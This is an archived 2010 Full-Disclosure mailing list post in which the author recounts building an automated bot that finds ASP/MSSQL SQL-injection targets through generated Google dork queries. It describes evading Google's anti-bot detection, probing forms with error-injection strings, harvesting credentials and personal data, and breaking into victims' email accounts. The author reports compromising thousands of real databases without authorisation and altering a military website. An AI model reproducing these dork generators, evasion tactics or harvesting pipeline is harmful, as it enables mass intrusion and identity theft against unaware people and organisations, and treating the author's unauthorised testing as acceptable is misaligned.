full-disclosure - Raising Robot Criminals

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <C26D0F02681C4545BB16A1819DA7DB3A@silence>
Date: Mon, 29 Mar 2010 20:28:06 +0200
From: "porkythepig" <porkythepig@...t.pl>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Raising Robot Criminals

"Raising Robot Criminals"


1. Intro.
/////////

Hi there.

I would like to share few thoughts concerning my recent research of the 
automated Sql Injection "seek and penetrate" attack vector, focused on 
identity theft and robot-driven attack propagation.

This "report" is a compilation of some analysis done for the runtime code 
results and some random thoughts and ideas written down, during different 
parts of the whole 2 year case study (all thanks to the advanced MS's 
technology called "Notepad")

While there have been dozens white papers on the subject of web application 
security as well as on Sql Injection, this text is not yet another one.
Instead, it's a short tale about an automated tool's developement time, 
inspired somehow by the subsequently intriguing output data it produced, 
data that actually made the code grow and mutate into different shapes.

The main objective was to build up the code and find out how far a fully 
automated seek-and-penetrate web-app probing code may go without any human 
supervision.
Moreover: to find what are the possibilities of future mutations for the 
attack vector implementations.

I think everyone easily brings up in their mind one of recently most famous 
comparisons in computer security research: an intruder who trespasses 
somebody's possession to tell the owner that his door locks are not good 
enough.
Well, this project from the very beginning was not an attempt to discuss 
this famous comparison's pros and cons.
Instead I decided to find out what are the ACTUAL NUMBERS between the 
execution of that particular attack vector in the wild.

The particular attack vector mutation that has been chosen to implement (but 
definitely not the only one there to implement) was a combination of few 
software and human factor vulnerabilities:
- sensitive data extraction through SQL Injection in web applications driven 
by Microsoft SQL Server and exploiting ASP server side scripts 
vulnerabilities,
- personal secret unsecure handling (by owner),
- personal secret unsecure storage (by the trustee),
- weak (or lack of) web search engines anti-robot detection/protection 
targeting malicious robot crawlers.

You should also understand, that from obvious reasons certain details 
concerning compromised organizations, companies and government institutions, 
have been removed or reduced to minimum in this publication.
Also, giving the type of the project and the nature of the "output data", I 
have decided NOT TO publish any source code (at least at this moment).

But first a bunch of probably well known facts.

Eleven years ago, Dec 25th 1998 the first official SQL Injection paper was 
published in the Phrack magazine, in an article called "NT Web Technology 
Vulnerabilities".
Since then the attack vector became one of the favourite instruments used by 
the cyber criminals in internet conducted data and indetity theft.

The second fact: today's cyberized organizations and companies that web 
users trust - that hold their personal data and sensitive unencrypted 
secrets: "passwords", bound to home addresses, phone numbers and social 
security numbers - are opened for remote penetration.

The last fact is that ever since the SQL command injection attacks began to 
sweep the internet's infrastucture, security researchers and grey hats 
there, trying to point out and prove the existence of a security hole which 
could open wide the particular company's database for possible user indetity 
theft, had but three options:

1. To warn the system's owner and await prosecution for computer hacking.

2. Keep their mouth shut, waiting until a cracker does his job silently, 
penetrating the system and trading stolen identity data to a 3rd party 
and/or turning the company's system into a trojan infection spreading unit.

3. Do nothing and watch how some script-kiddie eventually blows the database 
up, resulting often in a rapid and insufficient system patching, sometimes 
even without knowing the heart of the issue.

Again: since a detailed public discussion about the actual's organization 
cyber security (and their proprietary web applications including app links, 
penetration entrypoints, etc.) may generate much havoc - efforts were made 
to limit to minimum any details that could uncover direct penetration 
entrypoints (ie: links, interfaces) for the vulnerable corporations or 
government organizations systems mentioned in this text.
The reason behind that form of security advisory is quite simple - since no 
source code will be published for now and additionaly there shoudn't be and 
won't be any vulnerable app links listed in the text as "script-kiddie 
verifiable" examples - there are actually really few options left on how to 
tell something about the actual research results.
Therefore, instead of a formal advisory - here it is - a short story about a 
code and the research time itself rather than its results.
Since I'm a programmer - no writer at all - please forgive me my poor 
english, style and most of all, my dyslexia :)




2. The Impulse.
///////////////

As a team of researchers noted, a vulnerability dies when the number of 
systems it can exploit shrinks to insignificance.
Basing on that definition one could say that after the recent 10+ years of 
rich research intensive exploitation SQL Injection attack vector is alive as 
hell.

The whole thing with the research and the bot writing began during some 
early spring sunday (as usual, somewhere between 1st and 2nd coffee) while I 
tried to poke around to find some clues about a cryptography related problem 
on SecurityFocus.
By a complete accident I've spotted a question message from a totally 
different topic, from a user who was eagered to get some info about strange 
looking log entries that he found on his Apache server.
He was intrigued by and entry containing part of code-like looking payload 
and tried to get the answer if that logged event might have been some kind 
of attack attempt. What dragged my attention was the answer, which 
acknowledged his suspicions and identified the attack type as the Sql 
Injection remote code execution...

Now, I must say here, that since i was kind of "raised" on the oldschool 
assembler and rather low-level code tweaking (C64 forever:) over a hi-lev 
languages interoperability - I still dont know how but I have, strangely, 
kept certain distance as a programmer to any topic concerning SQL and 
relational databases before.
Actually I practicaly avoided SQL related activities, either professionaly 
or in private projects. The obvious result was my certain ignorance to the 
topic, refleced in attraction to a low-lev security issues like memory 
corruption and machine code reverse engineering. Finally, I trivialized the 
severity of attack vectors aimed against databases in any possible occasion.

Now, you see I was a little bit confused following the SF's user post.
After reading one or two Sql Injection white papers and numerous shouty 
articles describing this kind of attack vector multiple commercial system 
penetrations, I've had that biggest question on my mind: isn't the DB 
command injection threat something like 10 years well researched now and 
should be a little bit, well uhhhmmmm .... dead ?
why would anyone seriuosly attempt this kind of attack this days if the 
possible positive targets count would be close to zero, after that ammount 
of time that passed since it's been first researched and through all theese 
years of intensive exploitation?
And what's the deal with the remote code execution SQLi theese days?

Not a long time later, I've realized that being an ignorant has also its 
good sides :)
Ironicaly it seems that empirical ignorance may sometimes become 
one-helluva-impulse to a private research.





3. Sleepless.
/////////////

So I've had this huge question on my mind - all I needed was to check if I'm 
wrong and the malicious code injection mentioned in the SF user's post was 
just one on a milion - some last try of a 10 years old, dying rogue code, 
hopelessly knocking on today's secure database world :)

After going through about five "how to crack an Sql DB in less than a 
minute" 4yr+ old tutorials I've had all I needed: the algorithm of how to 
find a potential victim and how to probe it for penetration ability.

Just as in the SF's user case, I've decided to pick PHP and MySql based DB 
for start. And so I've began first "victim" hunt.
Asking google for a subsequent branch-types of companies I've been looking 
for my first "accessible" remote DB table record somewhere out there.

And here it is! I've got it!

A sex wax shop...

Whatever.
A hack is a hack.
Just modyfying manualy application's Http/GET params and here we go: we've 
got on our screen one by one all the accessible shop's customers details. 
And about an hour ago I thought SQLi is a 10 year old dead attack vector :)
If few minutes of manual googling produces an arbitrary DB read access I 
guessed it's worth a try to check if there was something more "interesting" 
than an online sex wax shop.

After another day or two of sleepless Http/GET params fuzzing and a bunch of 
accessed private corp client DBs varying from a fashion agencies to hotel 
booking systems I've decided to make friends with the different injection 
attack vector approach: ASP.
My collegue's first observation was - "Hey, MSSQL has a really nice user 
friendly cracking interface". Nicely formatted error message syntax, 
followed by elegantly served contents of programmer (or cracker) selected 
table's record, and even precise hex error code number!  Well, after all ASP 
server side scripting technology is a Microsoft's baby so as usual you get 
two in a pack of one.

The deal was actually quite simple: to locate a potential ASP SQLi attack 
victim you needed to locate a vulnerable web application endpoint. To do 
this you use URL target-filename pattern matching utilizing any web search 
engine. The apps-endpoint had of course to interact somehow with 
application's server side database, so that we could inject our query and 
execute it.  And which user's web application interface suits this goal 
better than the password based authentication interface :)

So here I was. The nightmare started.

Nothing more but a common script kiddie, sleeping sth like 3hrs a day I 
began to change into some kind of monstrous f***d up machine, typing 
repeatidely, like a magic spell, one and the same sentence into browser, 
again and again, asking google for subseqent matches against different 
patterns describing possible system entrypoints.




4. Word play.
/////////////

Any programmer's job is first to imagine how the "thing" you want to bring 
to life is going to work and then comes the fun part -  making the names - 
for your classes, methods, objects. In your code, everyting has to be named 
somehow and you're a god here to make it named. In security researcher's 
case however it's quite the opposite - you need to try to stand at the 
particular system's programmer place, imagining how could it have been 
coded - when you do so, you may be able to pick the places, by a file name 
pattern for example, where you would most probably make a mistake and left a 
security hole.
And of course the names... they are always the fun part.

After a day or two of brainless typing you finally begin to notice some 
patterns describing the word combinations you type and the results you get.

So, the names were coming and going, one by one, right into the gogole's 
search engine:

inurl:"Login.asp"
inurl:"CustomerLogon.asp"
inurl:"ClientLogon.asp"
inurl:"UserLogin.asp"+".gov"
inurl:"EmployeeLogin.asp"+".com"+"intranet"
...

System after system, inputting same apostrophe contating random sequence 
into all the found FORM html fields, submiting and watching for any sign of 
response page containing the familiar MSSQL's error code: 0x80040E14.
Funny that my finger-based "random generator" used for ASP "input fuzzing" 
soon lost much of its randomness - after sth like a thousand manually typed 
FORM input sequences they finally turned into: 'asd  (one could say, it 
became more like script-kiddie fingerprint :)

Obviously I did not focused so early on any specific SQLi mutation - giving 
a Blind SQL Injection for one - nevertheless the goal remained the same (ie: 
to check which one of the two is true: either the SQL Injection attack 
vector could in fact become a successful weapon in a potential malicious 
hands or that it's rather some old misty fraze nicely described in Wikipedia 
and few years long dead).
So few next days seemed pretty same: brainless typing, matching for errors, 
looking for subsequent targets, imagining any possible attack propagation 
paths.

Somewhere at the begining of the third day I've found an entry into a 
database of the bank... a SPERM bank to be precise.
"A bank is a bank. And I've just cracked a bank."
I guess I was repeating that to myself at least for next two days.

Anyway. When you notice you have began to act like a machine, repeating one 
keyboard driven activity over and over - it is THE time. Finally, the time 
to write some code has come. The code that will eventually relieve you from 
your pitiful human-only drink/eat/rest limitations and make your vengence 
possible upon the evil entity that turned you into machine for the past 
week... :)

The first idea was to code few simple search query generators based on a 
static word permutation lists and hook them up using HTTP client into a 
google. The case was all about shooting new words, grouping them into 
semantic sections and build simple lingual generators that would feed on the 
groupped word sections.

For example, the following two groups of words (taken directly from my 
code's config file), are to be mixed together creating different 
permutations to build a final web search  query:

Group0 = Logon
Group0 = Logon1
Group0 = Signon
Group0 = Signin
Group0 = Log_in

and

Group1 = Client
Group1 = User
Group1 = Master
Group1 = Admin
Group1 = Member
Group1 = Employee
Group1 = Customer
Group1 = Supplier

Using for example this query generator (actually it's the Bot's query 
generator#1):

q1 = "inurl:" G0 || ".asp"
q2 = "inurl:" G0 || G1 || ".asp"
q3 = "inurl:" G1 || G0 || ".asp"
q4 = "inurl:" G1 || "/" || G0 || ".asp"
q5 = "inurl:" G1 || G0 || "/" || "default.asp"

We receive something like this:

inurl:"Logon.asp"
inurl:"ClientLogon.asp"
inurl:"LogonClient.asp"
inurl:"Client/Logon.asp"
inurl:"ClientLogon/default.asp"
inurl:"UserLogon.asp"
inurl:"LogonUser.asp"
... and so on.


The whole problem with the search engines is that they provide only a very 
small, limited part of the actual query results, that their web crawler 
robots were able to harvest from the very start. Asking the search engine 
with those queries, we will receive maximum a 1000 hits (for google), while 
the number of matching results, following that query pattern is sometimes 
several thousand times bigger. Therefore we add for example a second and 
third level distinguish-groups, first describing the target company's branch 
and second distinquising between domain suffixes.


Group2 =
Group2 = voip
Group2 = remote
Group2 = banking
Group2 = airlines
Group2 = telecom
Group2 = software
Group2 = hosting
...

and

Group3 =
Group3 = com
Group3 = org
Group3 = net
Group3 = biz
Group3 = mil
Group3 = gov
Group3 = edu
...

Concatenating every query definition (in this example q1 to q4) with the 
sequence: nq = "+" || G2 || "+" || G3, as a result we get:

inurl:"ClientLogon.asp"
inurl:"ClientLogon.asp"+"com"
inurl:"ClientLogon.asp"+"voip"
inurl:"ClientLogon.asp"+"voip"+"com"
inurl:"ClientLogon.asp"+"voip"+"org"
inurl:"ClientLogon.asp"+"voip"+"net"
...

The algorithm for query generators is actually quite simple, starting with 
the most basic combinations, like:
inurl:"logon.asp"
inurl:"login.asp"
inurl:"login1.asp"
inurl:"signon.asp"
(combinations of words from just a single group) we expand the query with 
different word groups each new level, using specific, programmer defined 
concatenation.
At start we submit every generated query, store the results, and check the 
result counter for them. If it is larger than the search engine's result 
limit (lets say: 1000) we increase the generator level (to 2) and using the 
defined concatenation method for that level we generate subsequent queries 
with words from the next word group (ie: G1). If the predicted results count 
for some or all of the produced query strings is again bigger than the 
search engine's limit -> we go for the 3rd level generator concatention, and 
so on...

The same scheme applies to password reminder services query generator:

Group9 = 1password
Group9 = 1pwd
Group9 = 1pass
Group9 = 1passwd
Group9 = 1pw
Group9 = 0login
Group9 = 0userid
...

and

Group10 = 1forgot
Group10 = 1forget
Group10 = 1forgotten
Group10 = 1lost
Group10 = 0find
Group10 = 0search
Group10 = 0email
Group10 = 1recovery
Group10 = 1recover
Group10 = 1retrieve
Group10 = 0get
Group10 = 1change
Group10 = 0new
Group10 = 1reset
Group10 = 1remind
...

Query Generator #2:
q1 = G9 || '.asp'
q2 = G10 || '.asp'
q3 = G9 || G10 || '.asp'
q4 = G10 || G9 || '.asp'
q5 = G9 || G10 || '/' || 'default.asp'




5. One toy story.
/////////////////

Programmatic automation of human behaviour and watching the code as it 
interferes with random human beings is probably one of the coolest things in 
bot programming.
Since that actually wasn't first bot coding attempt, I've decided to base 
the code in major on one of my previous bot projects: an automated logic 
decisioning code - browser MMO auto-playing bot.
The previous code was a kind of "vendetta" over Ogame - an MMO browser game 
addiction that brutally took :) almost 3 months of my life (anyway a 
differnet kind of story).
Three years after it was "brought to life" I've decided to use its "guts", 
ie. HTTP client, HTML parser (bound together to provide a simple browser bot 
engine) and basic AI Api (which actually had to be rebuilt almost from 
scratch in this case) to create a different type of a robot code.




6. Robot vs. Anti-Robot.
////////////////////////

The first problem the new bot stumbled across was Google's anti-robot 
protection. Aside of all the rest of code that keeps Google engine alive and 
kicing this code was built by them for two things:
1. To prevent the Google servers from being DDoS-killed by remote query 
robot repeaters, the ones that for example are being used within automated 
WWW-stats software.
2. To recognize, signal and act against certain query patterns, being 
possibly malicious, like for example automated web site infection software, 
operating round the clock in search of new victims to embed the malicious 
scripts within (or to steal the data from).

The first version of code executed without any delays between the queries or 
any other kind of logic built in, to deal with the Google's anti-robot code 
(I simply didn't have a clue it existed at first place :) and ended up very 
quick with service-blocking entire NAT address space of my ISP and 
successfuly disabling it to use google for ab. 3h.
The second launch locked the subnet for about half a day :)

So the very next thing done was building in a simple static 30s sleep() 
between every page query HTTP request and disabling result-page jumping, 
sticking up to just one-page-by-time incremental step. Constant delays of 
course doesn't imitate human too perfectly, however the trick worked. At 
least for some time...
About two weeks of bot's runtime later I've noticed that only first 100 
results out of a thousand queries were dumped by the bot. Analysing the 
issue it came out that after 10th result page, Google displayed its old good 
"it seems like you're malicious robot trying to take control over the world" 
info and denied going further with selected query.
So... Did they implemented a different robot recognition algorithm within 
past two weeks, or what?
No. I don't think so.
Changing the delay to a bigger randomized value (90+RND(20)) did the job. 
For the next month the first segment of the Bot (ie: the web search engine 
hooked up target-seeker) executed without any recognition.
Fooling the Google's engine about being an actual human worked. After a 
month turning the value of query page change delay back to static 90s 
resulted instantineously with anti-robot service denial HTML warning, after 
requesting 10th page. So the conclusion was - to trespass the 
robot-protection the bot's thread should spend just enough CPU idle cycles 
between every page increment to imitate a human behaviour.

The further analysis shown that the google search engine acts differently 
for the queries containing certain URL file name specifiers like ".asp" or 
".php". The search queries that has been recognized to ask for theese file 
suffixes had simply a longer minimal page change delay to successfuly escape 
of being recognized as a "malicious robot". It also has been noticed that 
the google bot-lock of entire NAT area differs from 3 to ab. 32h. 
Additionaly, the subsequent malicious-looking queries while in robot-lock 
state hasn't been updating the lock countdown timer.

Google antibot code identifies remote human/non-human entity by IP not by 
search sesssion cookie, resulting in that, a single search from any machine 
within a local subnet behind the NAT that SUBSEQUENTLY uses the same search 
query pattern (like for example 'inurl:"forgotten.asp"'), will lead to IDing 
the subnet's public IP as a hostile by Google's code.
Anyway, long story short: to fool the Google's anti-bot protection we need 
proper delays and human-like action randomization.

Building a protection against the query auto-generating process employed by 
the robot software is not as difficult and obviously there could be 
implemented more precise detection of the automated SQLi query syntax, by 
the web search engine providers. Afterall, I guess it shoudn't be as easy as 
googling your homework to search for the R/W accessible sex wax shop 
customer database and get all clients info on the screen or to search for 
the vulnerable US Department of Justice system like you would have been 
googling for a dinner recipe.
However, it should also be considered that where a detection schema for 
malicious action exists - there usually are always numerous ways to override 
it. Fine detection algorithm shouldn't be taken as a "total cure" for the 
attacks using "robot-googling" as victim search vector.

Ironicaly, while the bot got better and better dealing with google's 
anti-robot recognition I was recognized few times by the very same system as 
a machine (yepp), while typing search queries manualy, using just an old 
school set of ten fingers :)




7. Bot's Development.
/////////////////////

There were two major code architecture changes through the whole 
developement time so three different, subsequentialy more complex versions 
of the bot has been developed, until it shaped into the final (or at least: 
current) automated system.

Since the code has been based mostly on previous bot's (MMO bot) code, 
written in C++, there wasn't actually much choice to be made about the 
programming language. Although one must point that the C++ isn't the best 
choice if we want to code a web crawling automated bot - looking backward 
from the whole coding time perspective if I had the choice today and had to 
write it from the scratch - I would have chosen Python blindfolded (at least 
for this kind of robot).

The very first version of bot was a simple automated google query repeater, 
using static "target patterns" (ie: ASP file name patterns to search, formed 
in a static input list). The static list of about 150 query-word 
combinations produced several thousand potential targets, which then were 
probed by the pen-test algorithm: retrieve HTML contents -> parse and search 
for FORM's -> feed every text-input field with error injection seq (ie: 
'having 1=1) -> parse response for MsSQL error message pattern -> if 
matched: enumerate all vulnerable SQL query columns -> log target probing 
result (positive/negative).

The SECOND code's version was armed with more logic for google's 
antirobot-protection "fooling" and introduced "run levels" into the probing 
section. The code segment performing actual penetration of positive-matched 
targets was given three run levels: vulnerability matching / database 
structure enumertaion (tables/columns/column types) / automated record 
harvest for every recognized (using name pattern matching) email/password 
column name combos. All the harvested EM/PW pairs were stored in the 
internal Bot's database.

The third (current) version went multiprocess. The code was divided into 3 
sections (called later 'segments') interoperating together through the 
internal DB and syncing through a named mutex. Two new major "toys" were 
also introduced:
1. "Pattern Generators" (three for now) providing Segment-1 (penetration 
target seeker) with possible victim's system URL patterns to use with google 
connected query repeater,
2. "Data Objective Patterns" configured from config file, providing quickly 
configurable regular expression based descriptions of what data the Bot 
should look for, within the penetrable remote database (ie: email/pwd 
combos, SSN/ID data, secret question/answer combos, credit card numbers).

The final (current) verions's architecture and execution flow:

The system consists of 3 independent code sections - called simply 
'segments' - that perform interruptably their specific objectives in the 
forever-loop. The segments are linked between just by a logic chain of the 
input/output data - what is an result(output) data of one segment is the 
input for the other. For example Segment-2 will not go operational until it 
receives enough input data which is automaticaly-produced output of 
Segment-1.

Segment-1 is an automated web search engine crawler driven by the 3 (so far) 
basic word-fraze generators, used to produce subsequent web search queries. 
For now the segment is coded to operate on two web search engines: 
google.com and search.com. It consists of 3 query pattern generators that 
produce subsequently permutations of selected query pattern, utilizing a 
specificaly preconfigured for the project 400 word dictionary, divided to 9 
functional groups. Every generated query is then used to perform an 
automated search using each search engine connected and the results are 
stored as Segment-1's output. After last query pattern generator has 
produced its last permutation - Segment-1 stops.

Segment-2 objective is to process every potential target address (HTTP/HTTPS 
link) that Segment-1's produced. It probes each system ONLY FOR ONE PRECISE 
type of SQL Injection vulnerabibity: attack against buggy ASP server side 
codes interconnected with MSSQL database systems. After positive match it 
builds a penetration entrypoint, enumerates all accessible databases through 
the entrypoint and scans all database's table structures for matches within 
preconfigured Data Objective Patterns. Finally it "decides" using the DOP 
matching which data will be a target for final penetration and performs an 
automated data harvest for every DOP matched through all the databases 
accessible entrypoints. Then is stores the data, pre-analyses it and goes 
for the next target supplied by the S-1.

Segment-3 is driven by the Segment-2's output data, pre-analyzed after every 
successful penetration. Every data entry that matches EMLPW Data Objective 
Pattern (email/password: every table that has been recognized to hold 
email/password combos records) becomes its input. This segment has 2 
operational modes. First one is a POP3 proto / HTTP(s) Webmail server 
discovery tool. At first it tries to match an email server protocol and 
location for every matched email/pw combos from Seg-2. After that using a 
recognized mail protocol, it performs a password matching for its 
corresponding email address. If the pair: EmailAddress/Password matches - it 
opens a mailbox using recognized protocol, enumerates all the messages and 
dumps every message containing one or more of the words: "account", "login", 
"password", "confidential" or "classified". After processing last output 
entry from the Segment-2 this segment stops.





8. A school for a robot.
////////////////////////

Before any bot can leave its "master" and go by itself into the dangerous 
human world it obviously needs a proper education and training :)
Just as its predecessor - the MMO bot for Ogame - training against different 
human opponents on different game's "universums" (servers), trying to grow, 
evolve and develop its best suited economic strategy algorithm - also the 
SQLi penetration bot has to take its education somewhere. Unfortunately 
there is one big difference between a game bot and a search-and-probe bot 
like this: as Ogame's client-server game protocol (HTTP based) could be 
reversed and described as a static sequence of URLs (links) to use by the AI 
"puppet master", the penetration bot need to deal every time with a 
different system - so it takes a lot more "training" for the second type of 
bot to have the highest probability for that the code will recognize a 
vulnerability if it exists and match the target as "negative" if doesn't, 
for EVERY pen-tested system.
Keeping false-negatives count as low as possible is a key factor in this 
kind of bot. Ironicaly it seems that the opposite situation may also occur 
(which I'll try describe later) - the human trained robot could find a 
vulnerability in a way that the human didn't even know about, actually, to 
be able to train him :)

The first bot's penetration automation has been developed by training it 
against vulnerable web database system (found earlier manualy), belonging to 
an international, security training company (right, the irony is sometimes 
unbearable...) providing private investigation / inteligence solutions. The 
developement was just as long as the bot was able to perform successfuly, 
ie. exited retrieving all the targeted data (personal information, 
login/email/password data records), with no human supervision. First version 
of the Bot performed ab. 100 subsequent penetrations of that system, until 
it was able to do so, while I was trying to patch the bot's logic flaws and 
to make the injection queries syntax used more simple and effective. 
Although every time the code harvested the very same data (later 
configurable as Data Objective Patterns in bot's second version) - 
subsequently aiming data within tables holding logins, emails and passwords 
of employees - the process must have been repeated as no code ever runs 
bug-free after just first compilation. (BTW: if any of your 'release' code 
could ever do so - according to the probability laws - you really should be 
worried :)
These subsequent coding/recompilation/execution steps in order to force the 
code to gain exactly same results as a human before, makes the code grow and 
learn in order to become a robot. But it is up to human (programmer) to 
decide who to await at the end of the "teaching line" - a malicious "robot 
criminal" or a vulnerability assesement and response framework.

There is also one big question on morality, left unanswered.
Why the hell to use an unaware life target for an excercise, becoming a 
criminal with every single enter you press, while you could build your own 
local vulnerable application server or even download a virtualized one, 
witin few minutes, preconfigured and pentest-ready?
The question is good.
The answer is tough (if any).

At the begin of the research I was a total SQL newbie (as a programmer). One 
of my first goals was to change it - combining the pleasant with the useful. 
And it's quite obvious that without a proper theoretical preparation, a 
tutorial-only based crack-and-destroy learning approach doesn't make a 
researcher of any kind - it makes a script kiddie. Finding differences 
within several different life vulnerable systems and matching them against 
each other to find all common factors that render them vulnearable is far 
more effective way to learn the automated vulnerability detection system 
(and me), than study approach based on a single, often naive example, which 
is usually already too old to make a realistic model.
While I was learning SQL language syntax - the bot was "learning" SQL 
Injection attack vector. For that, I guess every security researcher is a 
sinner somewhere there, wandering on his "split guilt" mindfields, leaving 
the final "enter key-press" decision to a human robot-code operator.



9. Randomized target penetration.
/////////////////////////////////

The penetration target - particular company or organization system is not 
human selected here.
The code, employing randomized target pattern matching algorithm "selects" 
it for you.
Obviously, saying: "I didn't commited a crime probing the system for the 
vuln, the code did it" - is somewhat childish, isn't it?
In the hands of a criminal any kind of pen-testing tool will always be 
programmed and used for malicious activities, regardless of its automation 
or manual oriented operation architecture.
Everything depends from the programmers intentions - if they were malicious, 
the code's behavior should also be expected to be malicious. In practice, 
the code that automates some more complex problem solving process is in fact 
a kind of snapshot on the strategic planning algorithm of programmers mind, 
either it is automated MMORPG tactics-decisioning bot code or a security 
vulnerability seek & penetration system.
Therefore, it would be nice to see some day, that the automated tools 
seeking for vulnerable information systems over specific country, industry 
branch or worldwide are in turn operational and running under control of 
people whoose job is to protect us from either cyber criminals or enemy 
cyberwarfare, (like for example every country's national CSIRT/CERT units).
At this moment it is not possible for whitehat "samaritans" out there to 
perform a remote system penetration testing without previous formal 
autorization from the systems owners - no matter how good their intentions 
would be and how detailed the pentest report prepared - they are considered 
as criminals with the very first enter key pressed.
As long as the particular public web app / web portal vulnerability exists, 
it makes a serious threat to any internet user who unaware of digital system 
compromise risks, trusted the system creators letting them process his 
private ID data along with the most sensitive of all: secrets and passwords, 
often universal ones. Once compromised, the system leads an attacker 
exploiting universal passwords to compromise of the person's digital 
security itself.





10. Primary Impact analysis.
////////////////////////////

After the bot's final version has been launched, it performed interruptably 
(not including few blackouts during ligthning storms on my village) for 
about a month. It probed from the Segment-1 produced list of 200K+ web 
system addresses exactly 28944 systems for possible penetration entrypoints.
It matched "positive" against ASP/MSSQL Injection attack, exactly 2601 
database servers, and tested them for possible penetration depth, 
enumerating any fully accessible (read/write) database system using the 
particular entrypoint DB User's access level.
Through a testing runtime month exactly 6557 databases from the particular 
2601 DB servers has been matched by the Bot as fully accessible, using the 
ASP based attack vector type.

The already known and widely recognized impact of the common SQL Injection 
attack falls into few categories:
a) sensitive information disclosure,
b) loss of data integrity,
c) database server remote code execution and further network penetration.

Putting aside for a moment the impact analysis case, I'd like to mention an 
accurate observation by a colleague of mine. One of my programmer friends, 
not related to a security industry however, once he saw an MSSQL server 
compromise in progress called it "an API for database cracking". It was, 
after all, a very right comparison.
The default SQL server error reporting configuration, being physicaly one of 
the motors of the ASP based command injection "popularity", equips an 
attacker with easily text-parser traceable 32bit error code, strict syntax 
and a single block error message containing apostroph enclosed particular 
data record requested by an attacker - a heaven for parser writers - the 
extracted data is prepared and served by server's error reporting engine 
like a dinner in a good restaurant. The only thing the attacker should do in 
order to watch the selected column's value on his web browser window is to 
enforce an ASP server side application to cause an SQL data type mismatch 
run-time error (a numeric/character type mismatch error, to be precise).

But lets get back to the impact.
As one security response team stated rightfully in one of its reports - one 
of the reasons behind a spree of malicious code embedded within web pages, 
may be infection of web page's administrator computer systems with spyware, 
crafted specificaly to steal the FTP/SSH protocol passwords stored locally 
by client software like TotalCommander or Putty. Despite the fact that 
system administrators belong to the security threat highly-aware group, the 
possibiblity of the compromise of the webmasters/administrators machine by 
malware infection definitely exists.
But this is just one possibility.

On the other hand, a constantly increasing activity, observed in Sql 
Injection driven attacks, and observations made during the research could 
suggest at least few different infection scenarios.

While analysing Bot's gathered data - some systems that had been found 
opened for the penetration by the code's pentest "reconasaince" section 
(segment-2) had been also matched (after post-runtime "manual" analysis) to 
be previously compromised by a different human attacker (or an attack code). 
Certain database records, reflecting the webpage's contents, contained an 
embedded "second stage" attack code in JavaScript, prepared to either 
redirect the user who launched this particular web site's section or to load 
and execute additional JS code from a different HTPP remote server. The 
servers addresses in most cases were terminated with chinese domain suffix.
That gives us the first alternative.

The second one is a compromise of a web hosting company.
Serving a proper example right away: the bot gained access to a database of 
Polish email/www hosting company, containing all the account login/password 
records needed by attacker to take control of any website hosted by the 
company, providing the attacker with correct FTP credentials (this case was 
also mentioned in other sections of the text). The same schema applies also 
to penetrable web application developement company databases.

However, the most frequently noticed (analysing Bot's results), opened way 
for attacker to infect a website with a rogue redirection/exploit code, was 
to exploit the SQL Injection vulnerability within a minor, less critical or 
long time dead but not yet removed webpage, stored however together on a 
single SQL server administrated by a more critical assets holding 
institution. Exploiting the fact that the vulnerable server side code (lets 
say an ASP in our example) while accessing SQL server data can use database 
user account shared with many other databases stored on that single server, 
an attacker executes automated enumeration of all the R/W accessible 
accounts (using for example db_name() MSSql function). After that all he 
need is to select any database enumerated earlier, suiting as a DB backend 
for the particular WWW site - this time more critical and not vulnerable to 
any direct attack - and to alter its contents, leaving the critical "secure" 
webpage either defaced or trojan infecting.
An absolute record-holder of this type, giving the number of single SQL 
server R/W accessible databases was a job portal developement company. A 
minor, old, but still working job website belonging to the company was 
tracked down by S1 and verified by S2 as vulnerable to a database command 
execution attack using "Register Account" interface as SQL command injection 
entrypoint. After enumeration of R/W accessible databases, Bot's S2 counted 
800+ databases accessible using same DB user as used by the vulnerable ASP 
script, including retired military officer job portal and law enforcement 
job portals.
The most critical system however, given the possible impact of webpage 
defacement/malware infection attack, was the case of database server 
belonging to the US Defence Logistics Agency (DLA). Five, out of twenty of 
all server-stored databases were found write accessible, using same DB user 
account shared with the vulnerable ASP code: a very old (dating last century 
actually) and hardly operational but still online - same agancy's system, 
developed and "maintained" (not that they didn't try) according to a welcome 
banner, by the U.S. Space and Naval Warfare Systems Center (SPAWAR). It's 
not to hard to imagine the possible impact factor of a defacement/trojan 
infection code installment within an official military owned web system, 
that utilizes the attacker controlled databases contents to render every 
single piece of data and script embeded within their mainpage's HTML body.
Since I've never been a big fan of shouty, messy defacements - all that was 
done in that case, to validate if the modification of the particular 
selected DLA page's contents (www.desc.dla.mil) was in fact possible using a 
vulnerability located in a completely different subdomain - was changing a 
single small 'a' letter in the fronpage's welcome text to a capital one. 
Actually, if the "mispelling" hasn't been noticed yet, it's quite possible 
it is still there ...

One obvious conclusion is that the resulting, final impact of the SQL 
Injection attack conducted through a vulnerable website's entrypoint, which 
reflects the inter-connected database contents, can be also (for one) the 
website driven malware infection, targetting client host machines. The 
affected website (hosting a hostile script for redirection / malware 
installment now) may be any web application whose contents is rendered using 
the database system shared with the vulnerable entrypoint, through the same 
ODBC user credentials.





11. I forget, therfore I am.
////////////////////////////

So, you say you use top-notch only well secured systems, where common 
security holes are a far history, yet, your digital account still got hacked 
somehow...
Well, there's at least one thing we might be missing.
Even when you use trusted company systems like e-banking accounts, 
government or military provided systems, which, lets assume for a moment, 
are free from the most common security flaws :) , your password is long and 
random, you keep it private and didn't even whisper it ever - there is still 
a single thing that makes any of these different system accounts vulnerable: 
your short memory.

The first primitive bot's version, messy coded, with statically compiled-in 
search queries (describing just few possible victim patterns), after a day 
or two has probed and matched a DB command injection flaw within one of web 
applications belonging to an aviation-holding corporation operating in the 
USA (the holding owns actually six different airlines).
The actual impulse that turned me to continue this project and to build the 
multilevel attack code (rather than just drop the case after getting 
acknowledged that the internet is just an SQL Injection swamp) was the 
finding, made while "studying" this particular system. After getting the 
admin's credentials using the particular SQLi vuln and logging into personel 
data administration panel - a single Excel document file was downloaded, 
containing updated detailed information of 1361 company workers. Besides 
their addresses, phones and SSN numbers, every personal record had filled in 
a proper email address, login name and an unprotected plaintext password 
belonging to the particular worker of the aviation support company's branch.
Now, I'm sure it may be obvious to you right now, but it wasn't so obvious 
